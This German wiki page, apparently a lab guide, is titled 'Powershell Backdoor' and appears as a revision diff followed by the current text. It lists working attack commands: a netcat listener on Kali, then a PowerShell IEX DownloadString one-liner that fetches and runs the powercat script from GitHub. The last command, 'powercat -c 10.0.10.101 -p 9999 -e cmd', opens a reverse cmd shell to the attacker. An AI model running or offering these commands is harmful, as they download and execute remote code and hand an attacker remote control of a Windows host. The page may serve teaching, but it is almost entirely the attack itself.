Powershell Backdoor: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „=Angreifer öffnet Port(kali)= *netcat -l -p 9999 =Skript runterladen(windows)= curl https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps…“)
 
 
Zeile 1: Zeile 1:
 
=Angreifer öffnet Port(kali)=
 
=Angreifer öffnet Port(kali)=
 
*netcat -l -p 9999
 
*netcat -l -p 9999
=Skript runterladen(windows)=
+
=Skript runterladen(Windows Powershell)=
  curl https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1 -o powercat.ps1
+
  IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
 +
 
 
=Backdoor starten(windows)=
 
=Backdoor starten(windows)=
 
*powercat -c 10.0.10.101 -p 9999 -e cmd -v
 
*powercat -c 10.0.10.101 -p 9999 -e cmd -v

Aktuelle Version vom 6. August 2024, 09:28 Uhr

Angreifer öffnet Port(kali)

  • netcat -l -p 9999

Skript runterladen(Windows Powershell)

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Backdoor starten(windows)

  • powercat -c 10.0.10.101 -p 9999 -e cmd -v